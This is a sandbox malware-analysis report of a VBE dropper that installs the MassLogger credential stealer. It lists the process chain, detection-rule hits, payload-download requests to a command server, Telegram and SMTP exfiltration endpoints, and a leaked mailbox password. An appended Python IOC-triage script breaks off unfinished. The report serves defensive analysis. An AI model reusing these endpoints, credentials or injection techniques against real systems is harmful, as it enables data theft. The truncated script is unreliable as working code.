

Windows Analysis Report
Ref#150062.vbe

Overview

General Information

Sample name: Ref#150062.vbe
Analysis ID: 1557622
MD5: 2874840f439a79083be1cb832dbd10f4
SHA1: e121f6fd96b75bc492c4a463c9d03d273d658f1b
SHA256: 491e3f2d6ee7add3f362046c59a5ff7f8a292119b762d2b1f3174a283d41393d
Tags: vbe, user-TeamDreier

Detection

MassLogger RAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Yara detected MassLogger RAT
Yara detected Telegram RAT
AI detected suspicious sample
Injects a PE file into a foreign processes
Potential evasive VBS script found (sleep loop)
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Script Initiated Connection
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 7064 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Ref#150062.vbe" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • wscript.exe (PID: 4592 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\pcPseOUmXnpEaeF.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • wscript.exe (PID: 1260 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\pcPseOUmXnpEaeF.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 7064 cmdline: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wermgr.exe (PID: 2248 cmdline: "C:\Windows\system32\wermgr.exe" "-outproc" "0" "7064" "2696" "2648" "2700" "0" "0" "2704" "0" "0" "0" "0" "0" MD5: 74A0194782E039ACE1F7349544DC1CF4)
    • powershell.exe (PID: 1888 cmdline: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • RegSvcs.exe (PID: 5184 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
      • wermgr.exe (PID: 2380 cmdline: "C:\Windows\system32\wermgr.exe" "-outproc" "0" "1888" "2588" "2776" "2068" "0" "0" "2076" "0" "0" "0" "0" "0" MD5: 74A0194782E039ACE1F7349544DC1CF4)
  • rundll32.exe (PID: 6820 cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)
  • cleanup
{"EXfil Mode": "SMTP", "From": "sendxmaffle@jertcot.shop", "Password": "VVNrTTiP", "Server": "jertcot.shop", "To": "maffle@jertcot.shop", "Port": 587}
Source | Rule | Description | Author | Strings
Source: 0000000C.00000002.2949838278.0000000001162000.00000040.00000400.00020000.00000000.sdmp | Rule: JoeSecurity_MassLogger | Description: Yara detected MassLogger RAT | Author: Joe Security
Source: 0000000C.00000002.2949838278.0000000001162000.00000040.00000400.00020000.00000000.sdmp | Rule: JoeSecurity_CredentialStealer | Description: Yara detected Credential Stealer | Author: Joe Security
Source: 0000000C.00000002.2949838278.0000000001162000.00000040.00000400.00020000.00000000.sdmp | Rule: JoeSecurity_TelegramRAT | Description: Yara detected Telegram RAT | Author: Joe Security
Source: 0000000C.00000002.2949838278.0000000001162000.00000040.00000400.00020000.00000000.sdmp | Rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Description: unknown | Author: unknown
• 0xeffd:$a1: get_encryptedPassword
• 0xf325:$a2: get_encryptedUsername
• 0xed86:$a3: get_timePasswordChanged
• 0xeea7:$a4: get_passwordField
• 0xf013:$a5: set_encryptedPassword
• 0x10978:$a7: get_logins
• 0x10629:$a8: GetOutlookPasswords
• 0x1041b:$a9: StartKeylogger
• 0x108c8:$a10: KeyLoggerEventArgs
• 0x10478:$a11: KeyLoggerEventArgsEventHandler
Source: 0000000C.00000002.2951280494.0000000003206000.00000004.00000800.00020000.00000000.sdmp | Rule: JoeSecurity_CredentialStealer | Description: Yara detected Credential Stealer | Author: Joe Security
Source | Rule | Description | Author | Strings
Source: 12.2.RegSvcs.exe.1160000.0.unpack | Rule: JoeSecurity_MassLogger | Description: Yara detected MassLogger RAT | Author: Joe Security
Source: 12.2.RegSvcs.exe.1160000.0.unpack | Rule: JoeSecurity_CredentialStealer | Description: Yara detected Credential Stealer | Author: Joe Security
Source: 12.2.RegSvcs.exe.1160000.0.unpack | Rule: JoeSecurity_TelegramRAT | Description: Yara detected Telegram RAT | Author: Joe Security
Source: 12.2.RegSvcs.exe.1160000.0.unpack | Rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Description: unknown | Author: unknown
• 0xf1fd:$a1: get_encryptedPassword
• 0xf525:$a2: get_encryptedUsername
• 0xef86:$a3: get_timePasswordChanged
• 0xf0a7:$a4: get_passwordField
• 0xf213:$a5: set_encryptedPassword
• 0x10b78:$a7: get_logins
• 0x10829:$a8: GetOutlookPasswords
• 0x1061b:$a9: StartKeylogger
• 0x10ac8:$a10: KeyLoggerEventArgs
• 0x10678:$a11: KeyLoggerEventArgsEventHandler
Source: 12.2.RegSvcs.exe.1160000.0.unpack | Rule: MAL_Envrial_Jan18_1 | Description: Detects Encrial credential stealer malware | Author: Florian Roth
• 0x14269:$a2: \Comodo\Dragon\User Data\Default\Login Data
• 0x13767:$a3: \Google\Chrome\User Data\Default\Login Data
• 0x13a75:$a4: \Orbitum\User Data\Default\Login Data
• 0x1486d:$a5: \Kometa\User Data\Default\Login Data

Source | Rule | Description | Author | Strings
Source: amsi64_1888.amsi.csv | Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | Author: ditekSHen
• 0xc137:$b2: ::FromBase64String(
• 0xbda3:$s1: -join
• 0xc14b:$s1: -join
• 0x554f:$s4: +=
• 0x5611:$s4: +=
• 0x9838:$s4: +=
• 0xb955:$s4: +=
• 0xbc3f:$s4: +=
• 0xbd85:$s4: +=
• 0xe338:$s4: +=
• 0xe3b8:$s4: +=
• 0xe47e:$s4: +=
• 0xe4fe:$s4: +=
• 0xe6d4:$s4: +=
• 0xe758:$s4: +=
• 0xc55f:$e4: Get-WmiObject
• 0xc74e:$e4: Get-Process
• 0xc7a6:$e4: Start-Process

System Summary

Source: Network Connection | Author: frack113, Florian Roth | Data: DestinationIp: 144.91.79.54, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 7064, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49730
Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Ref#150062.vbe", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Ref#150062.vbe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Ref#150062.vbe", ProcessId: 7064, ProcessName: wscript.exe
Source: Network Connection | Author: frack113 | Data: DestinationIp: 144.91.79.54, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 7064, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49730
Source: Network Connection | Author: frack113 | Data: DestinationIp: 162.254.34.31, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Initiated: true, ProcessId: 5184, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49932
Source: Process started | Author: Michael Haag | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Ref#150062.vbe", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Ref#150062.vbe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Ref#150062.vbe", ProcessId: 7064, ProcessName: wscript.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" , CommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\pcPseOUmXnpEaeF.vbs" , ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 1260, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" , ProcessId: 7064, ProcessName: powershell.exe

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-18T13:44:23.322025+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49883 | 193.122.6.168 | 80 | TCP
2024-11-18T13:44:30.337620+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49883 | 193.122.6.168 | 80 | TCP



AV Detection

Source: 12.2.RegSvcs.exe.1160000.0.unpack | Malware Configuration Extractor: MassLogger {"EXfil Mode": "SMTP", "From": "sendxmaffle@jertcot.shop", "Password": "VVNrTTiP", "Server": "jertcot.shop", "To": "maffle@jertcot.shop", "Port": 587}
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.8% probability

Location Tracking

Source: unknown | DNS query: name: reallyfreegeoip.org
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49889 version: TLS 1.0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows

Software Vulnerabilities

Source: C:\Windows\System32\wscript.exe | Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 01618519h | 12_2_01618268
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 01618DB8h | 12_2_016189A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 01618DB8h | 12_2_0161898F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 01618DB8h | 12_2_01618CE6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0161F958h | 12_2_0161F658
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0161FDB0h | 12_2_0161FB08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then push 00000000h | 12_2_05BF7A68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05BF0742h | 12_2_05BF0498
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05BF26E0h | 12_2_05BF2438
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h | 12_2_05BF37D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05BF19D8h | 12_2_05BF1730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05BF33E8h | 12_2_05BF3140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05BF02E8h | 12_2_05BF0040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05BF1580h | 12_2_05BF12D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05BF44A5h | 12_2_05BF42C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05BF4E2Fh | 12_2_05BF42C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05BF2F90h | 12_2_05BF2CE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05BF2288h | 12_2_05BF1FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05BF1128h | 12_2_05BF0E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05BF2B38h | 12_2_05BF2890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05BF0CD0h | 12_2_05BF08F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then lea esp, dword ptr [ebp-04h] | 12_2_05BF8875
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05BF1E30h | 12_2_05BF1B88

Networking

Source: C:\Windows\System32\wscript.exe | Network Connect: 144.91.79.54 80
Source: global traffic | TCP traffic: 192.168.2.4:49932 -> 162.254.34.31:587
Source: global traffic | HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 144.91.79.54
Source: Joe Sandbox View | IP Address: 193.122.6.168
Source: Joe Sandbox View | ASN Name: CONTABODE
Source: Joe Sandbox View | JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: unknown | DNS query: name: checkip.dyndns.org
Source: unknown | DNS query: name: reallyfreegeoip.org
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49883 -> 193.122.6.168:80
Source: global traffic | TCP traffic: 192.168.2.4:49932 -> 162.254.34.31:587
Source: global traffic | HTTP traffic detected: GET /1211/s HTTP/1.1 | Connection: Keep-Alive | Accept: */* | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | Host: 144.91.79.54
Source: global traffic | HTTP traffic detected: GET /1211/r HTTP/1.1 | Connection: Keep-Alive | Accept: */* | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | Host: 144.91.79.54
Source: global traffic | HTTP traffic detected: GET /1211/upcYWNLeVWW8atGcZt0Z.txt HTTP/1.1 | Connection: Keep-Alive | Accept: */* | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | Host: 144.91.79.54
Source: global traffic | HTTP traffic detected: GET /1211/cn HTTP/1.1 | Connection: Keep-Alive | Accept: */* | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | Host: 144.91.79.54
Source: global traffic | HTTP traffic detected: GET /1211/v HTTP/1.1 | Connection: Keep-Alive | Accept: */* | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | Host: 144.91.79.54
Source: global traffic | HTTP traffic detected: GET /1211/file HTTP/1.1 | Connection: Keep-Alive | Accept: */* | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | Host: 144.91.79.54
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49889 version: TLS 1.0
Source: unknown | TCP traffic detected without corresponding DNS query: 144.91.79.54 (50 identical entries)
Source: global traffic | HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /1211/s HTTP/1.1 | Connection: Keep-Alive | Accept: */* | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | Host: 144.91.79.54
Source: global traffic | HTTP traffic detected: GET /1211/r HTTP/1.1 | Connection: Keep-Alive | Accept: */* | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | Host: 144.91.79.54
Source: global traffic | HTTP traffic detected: GET /1211/upcYWNLeVWW8atGcZt0Z.txt HTTP/1.1 | Connection: Keep-Alive | Accept: */* | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | Host: 144.91.79.54
Source: global traffic | HTTP traffic detected: GET /1211/cn HTTP/1.1 | Connection: Keep-Alive | Accept: */* | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | Host: 144.91.79.54
Source: global traffic | HTTP traffic detected: GET /1211/v HTTP/1.1 | Connection: Keep-Alive | Accept: */* | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | Host: 144.91.79.54
Source: global traffic | HTTP traffic detected: GET /1211/file HTTP/1.1 | Connection: Keep-Alive | Accept: */* | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | Host: 144.91.79.54
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic | DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic | DNS traffic detected: DNS query: jertcot.shop
Source: wscript.exe, 00000000.00000003.1718508588.0000014AD4D89000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1698854743.0000014AD4D31000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1718673514.0000014AD4D97000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://144.91.79.54/
Source: wscript.exe, 00000000.00000003.1698854743.0000014AD4D31000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://144.91.79.54/0
Source: wscript.exe, 00000000.00000003.1855170962.0000014AD4D72000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1850754950.0000014AD4D69000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1860544185.0000014AD4D73000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1851807052.0000014AD4D69000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://144.91.79.54/1211/Y
Source: wscript.exe, 00000000.00000003.1816091185.0000014AD6AAD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://144.91.79.54/1211/cn
Source: wscript.exe, 00000000.00000003.1816534726.0000014AD4DAC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1814678830.0000014AD4DA0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://144.91.79.54/1211/cng
Source: wscript.exe, 00000000.00000003.1816091185.0000014AD6AAD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1851523290.0000014AD6AAD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1857344788.0000014AD6AB3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1853417170.0000014AD6AB2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1860821496.0000014AD6AB3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1719027708.0000014AD6AAD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1852166734.0000014AD6AAD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://144.91.79.54/1211/r
Source: wscript.exe, 00000000.00000003.1698784880.0000014AD4D56000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://144.91.79.54/1211/s
Source: wscript.exe, 00000000.00000003.1698854743.0000014AD4D31000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://144.91.79.54/8
Source: wscript.exe, 00000000.00000003.1698854743.0000014AD4D31000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://144.91.79.54/H
Source: wscript.exe, 00000000.00000003.1698854743.0000014AD4D31000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://144.91.79.54/ll
Source: wscript.exe, 00000000.00000003.1852355017.0000014AD4D07000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1852640806.0000014AD4D0C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1854323961.0000014AD4D0E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1860304459.0000014AD4D0E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://144.91.79.54:80/1211/file
Source: RegSvcs.exe, 0000000C.00000002.2951280494.0000000003160000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.com
Source: RegSvcs.exe, 0000000C.00000002.2951280494.0000000003160000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.comd
Source: RegSvcs.exe, 0000000C.00000002.2951280494.000000000314E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2951280494.0000000003206000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2951280494.0000000003160000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org
Source: RegSvcs.exe, 0000000C.00000002.2951280494.00000000030E1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/
Source: RegSvcs.exe, 0000000C.00000002.2951280494.0000000003206000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2951280494.0000000003160000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/d
Source: RegSvcs.exe, 0000000C.00000002.2949838278.0000000001162000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/q
Source: RegSvcs.exe, 0000000C.00000002.2951280494.0000000003160000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.orgd
Source: RegSvcs.exe, 0000000C.00000002.2951280494.0000000003206000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://jertcot.shop
Source: RegSvcs.exe, 0000000C.00000002.2951280494.0000000003206000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://jertcot.shopd
Source: RegSvcs.exe, 0000000C.00000002.2951280494.000000000317D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://reallyfreegeoip.org
Source: RegSvcs.exe, 0000000C.00000002.2951280494.000000000317D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://reallyfreegeoip.orgd
Source: RegSvcs.exe, 0000000C.00000002.2951280494.00000000030E1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: RegSvcs.exe, 0000000C.00000002.2951280494.0000000003206000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot
Source: RegSvcs.exe, 0000000C.00000002.2949838278.0000000001162000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
Source: RegSvcs.exe, 0000000C.00000002.2951280494.0000000003160000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org
Source: RegSvcs.exe, 0000000C.00000002.2949838278.0000000001162000.00000040.00000400.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2951280494.0000000003160000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: RegSvcs.exe, 0000000C.00000002.2951280494.0000000003160000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/155.94.241.187d
Source: RegSvcs.exe, 0000000C.00000002.2951280494.0000000003160000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/155.94.241.187l
                Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
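The memory-string rows above are the raw material for an IOC list, but they need cleaning first: a string scanner stops at the first non-printable byte, so a URL that sits next to other data in memory shows up with one extra adjacent letter (`checkip.dyndns.comd`, `jertcot.shopd`, the `187d` / `187l` pair). The script below is an added example, not part of the Joe Sandbox report: it takes the strings exactly as listed in those rows, collapses the trailing-byte variants, and labels each surviving URL. The labels and the collapsing heuristic are this example's own interpretation; `jertcot.shop` is deliberately left unclassified because the report says nothing about its role.

```python
"""Triage of the 'String found in binary or memory' rows above.

Added example, not part of the Joe Sandbox report. The strings are copied
from the report rows; the grouping logic and labels are this example's
own heuristics.
"""
import re

# Constructed input: the URL strings from the RegSvcs.exe / wscript.exe rows.
MEMORY_STRINGS = [
    "http://144.91.79.54:80/1211/file",
    "http://checkip.dyndns.com",
    "http://checkip.dyndns.comd",
    "http://checkip.dyndns.org",
    "http://checkip.dyndns.org/",
    "http://checkip.dyndns.org/d",
    "http://checkip.dyndns.org/q",
    "http://checkip.dyndns.orgd",
    "http://jertcot.shop",
    "http://jertcot.shopd",
    "http://reallyfreegeoip.org",
    "http://reallyfreegeoip.orgd",
    "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name",
    "https://api.telegram.org/bot",
    "https://api.telegram.org/bot-/sendDocument?chat_id=",
    "https://reallyfreegeoip.org",
    "https://reallyfreegeoip.org/xml/",
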